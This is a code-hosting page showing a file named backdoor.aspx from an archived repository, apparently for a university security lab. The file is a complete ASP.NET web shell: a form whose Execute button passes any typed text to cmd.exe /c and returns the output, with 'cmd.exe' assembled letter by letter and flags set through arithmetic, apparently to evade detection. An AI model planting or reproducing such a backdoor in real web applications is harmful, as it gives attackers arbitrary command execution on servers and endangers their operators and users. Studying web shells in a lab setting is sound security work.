This repository has been archived on 2023-12-31. You can view files and clone it, but cannot push or open issues or pull requests.
EDA263/lab3/cs_lab3/myWebApplication/Demo/backdoor.aspx

48 lines
1.5 KiB
Plaintext
Raw Permalink Normal View History

2022-02-23 14:05:00 +01:00
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e)
{
}
string doRunCmd(string arg)
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "c";
psi.FileName += "m";
psi.FileName += "d";
psi.FileName += ".";
psi.FileName += "e";
psi.FileName += "x";
psi.FileName += "e";
psi.Arguments = "/";
psi.Arguments += "c";
psi.Arguments += arg;
psi.RedirectStandardOutput = (2 + 3 == 5);
psi.UseShellExecute = (1 + 2 == 4);
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}
void cmdrun_Click(object sender, System.EventArgs e)
{
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(doRunCmd(txtArg.Text)));
Response.Write("</pre>");
}
</script>
<HTML>
<HEAD>
<title>asp.net webshell</title>
</HEAD>
<body >
<form id="cmd" method="post" runat="server">
<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="Execute" OnClick="cmdrun_Click"></asp:Button>
<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
</form>
</body>
</HTML>